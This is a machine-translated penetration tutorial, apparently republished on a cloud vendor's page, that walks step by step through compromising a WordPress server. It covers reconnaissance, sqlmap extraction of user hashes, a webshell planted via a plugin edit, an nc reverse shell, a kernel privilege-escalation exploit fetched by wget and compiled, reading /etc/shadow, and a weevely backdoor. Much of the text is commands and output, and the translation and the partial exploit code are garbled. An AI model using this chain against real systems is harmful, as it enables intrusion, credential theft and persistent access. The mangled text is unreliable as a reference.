Through this article you will understand the hacker commonly used ideas and techniques, suitable for love of network information security Novice friends to learn. This article begins with the first collection of information about how hackers are stepping through your site and server. Read this article and you'll learn the following:
Use of 2.sqlmap
Use of 3.nmap
4.nc Bounce Right
Elevation of privilege for 5.linux systems
6.backtrack 5 penetration test Tool Nikto and W3AF use, etc.
Suppose the hacker is going to invade your website domain name: hack-test.com
Let's use the ping command to get the IP address of the Web server.
Now we get the IP address of the Web server: 173.236.138.113
To find other sites on the same server, we use sameip.org.
Sites hosted on IP Address 173.236.138.113
| Id | Domain | Site Link |
| 1 | Hijackthisforum.com | Hijackthisforum.com |
| 2 | Sportforum.net | Sportforum.net |
| 3 | Freeonlinesudoku.net | Freeonlinesudoku.net |
| 4 | Cosplayhell.com | Cosplayhell.com |
| 5 | videogamenews.org | videogamenews.org |
| 6 | Gametour.com | Gametour.com |
| 7 | Qualitypetsitting.net | Qualitypetsitting.net |
| 8 | Brendanichols.com | Brendanichols.com |
| 9 | 8ez.com | 8ez.com |
| 10 | Hack-test.com | Hack-test.com |
| 11 | Kisax.com | Kisax.com |
| 12 | Paisans.com | Paisans.com |
| 13 | Mghz.com | Mghz.com |
| 14 | Debateful.com | Debateful.com |
| 15 | Jazzygoodtimes.com | Jazzygoodtimes.com |
| 16 | Fruny.com | Fruny.com |
| 17 | Vbum.com | Vbum.com |
| 18 | Wuckie.com | Wuckie.com |
| 19 | Force5inc.com | Force5inc.com |
| 20 | Virushero.com | Virushero.com |
| 21st | Twincitiesbusinesspeernetwork.com | Twincitiesbusinesspeernetwork.com |
| 22 | Jennieko.com | Jennieko.com |
| 23 | Davereedy.com | Davereedy.com |
| 24 | Joygarrido.com | Joygarrido.com |
| 25 | Prismapp.com | Prismapp.com |
| 26 | Utiligolf.com | Utiligolf.com |
There are 26 websites on 173.236.138.113, many hackers may check other websites on the same server in order to hack your website, but this is a research goal, we will throw away other websites on the server, only for your website to conduct intrusion detection.
We ' ll need more information about your site, such as:
We need the following information about your website:
Let's start looking for your site's DNS records, we use who.is to accomplish this goal.
We found that your DNS records are as follows
Let's determine the type of Web server
Discover that your W EB server is Apache and then determine its version.
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
Next is the time to find your website domain name registration information, your phone, email, address and so on.
We have now obtained the registration information of your website domain name, including your important information. We can get your website server OS type and server version via Whatweb in Backtrack 5.
We found your website using the famous PHP whole station program WordPress, the server's system type for Fedora Linux,web Server version Apache 2.2.15. Continue to view Web server open ports, using the Penetration test tool Nmap:
1-find Services, the run on server (view service running on the server)
2-find Server OS (view OS version)
Only the 80 ports are open, the operating system is Linux2.6.22 (Fedora Core 6), and now we have collected all the important information about your site, and then start scanning for vulnerabilities such as:
SQL Injection–blind SQL INJECTION–LFI–RFI–XSS–CSRF and so on.
We will use Nikto to collect vulnerability information:
[Email protected]:/pentest/web/nikto# perl nikto.pl-h hack-test.com
We will also use the W3AF tool in backtrack 5 R1:
[Email protected]:/pentest/web/w3af#./w3af_gui
We enter the address of the website to be detected and select the Complete security audit option.
Wait a moment, and you'll see the results of the scan.
Discover that your site has SQL injection vulnerabilities, XSS vulnerabilities, and other vulnerabilities. Let's explore SQL injection vulnerabilities.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
We found this URL with a SQL injection through the tool, and we detected the URL through Sqlmap.
Using sqlmap with–u URL
After a while, you'll see
Enter N Press ENTER to continue
We found that your site exists MySQL error injection, MySQL database version is 5.0. We try to collect the database name by adding the parameter "-dbs".
Found three databases, followed by the parameter "-D wordpress-tables" To view all the table names of the WordPress database
Use the parameter "-T wp_users–columns" to view the fields in the Wp_users table.
Next, guess the values for the fields User_login and User_pass. With the parameter "-C User_login,user_pass–dump"
We will find the user name and password hashes value. We need to hack the password through the following online hack website hashes
http://www.onlinehashcrack.com/free-hash-reverse.php
Login WordPress Backstage Wp-admin
Try uploading PHP Webshell to the server to make it easy to run some Linux commands. Look for any plugins you can edit on the plugins page. We choose textile This plugin, edit insert our PHP webshell, click Update file, then visit our PHP Webshell.
PHP Webshell is parsed, we can control the file of your website, but we only want to get the root of the Web server, to invade the other sites on the server.
We use NC to bounce a shell, first listening on 5555 ports on our computer.
Then connect our computer in reverse on PHP webshell, enter your IP and port 5555.
Click Connect and we'll see
Next we try to execute some commands:
Id
uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)
(Used to display the user's ID and group)
Pwd
/var/www/html/hackademic_rtb1/wp-content/plugins
(Displays the current path on the server)
Uname-a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 gnu/linux
(Displays kernel version information)
Now we know that the kernel version of the server is 2.6.31.5-127.fc12.1686, and we are searching the exploit-db.com for a related vulnerability in this version.
After testing a lot of exp on the server, we use the following exp to elevate the permissions.
http://www.exploit-db.com/exploits/15285
We execute the following command on the NC Shell:
wget/http/ Www.exploit-db.com/exploits/15285-o roro.c
(download exp to server and rename to roro.c)
Note: The exp of many Linux kernels is developed in C language, So we save the. c extension.
Exp RORO.C code is as follows:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include < Netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
# Include <sys/utsname.h>
#define Recvport 5555
#define SendPort 6666
int prep_sock (int port)
{
int S, ret;
struct sockaddr_in addr;
S = socket (pf_rds, sock_seqpacket, 0);
if (S < 0)
{
printf ("[*] Could not open socket.\n");
Exit (-1);
}
memset (&addr, 0, sizeof (addr));
Through the above code we found that EXP is developed in C language, we need to compile him into the elf format, the command is as follows:
GCC Roro.c–o RoRo
Next execute the compiled exp
./roro
We enter the ID command after execution is complete.
Id
We've found that we're already rooted.
Uid=0 (Root) gid=0 (root)
We can now view the/etc/shadow file
Cat/etc/shadow
View/etc/passwd File
cat/etc/passwd
We can use the "John the Ripper" tool to hack passwords for all users. But we won't do that, we need to leave the back door on this server to make it easier for us to access it at any time.
We use weevely to make a PHP small immediately upload to the server.
1.weevely Use options
[Email protected]:/pentest/backdoors/web/weevely#./main.py–
2. Create a PHP backdoor with weevely with a password of Koko
[Email protected]:/pentest/backdoors/web/weevely#./MAIN.PY-G-O hax.php-p koko
Then upload it to the server and use it.
[Email protected]:/pentest/backdoors/web/weevely#./main.py-t-U http://hack-test.com/Hackademic_RTB1/wp-content/ Plugins/hax.php-p Koko
Test our hax.php back door.
Summarize:
Some of the technologies we've learned in this article are being hacked into your website and servers, and we hope this article will help you maintain your server and website security in the future.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
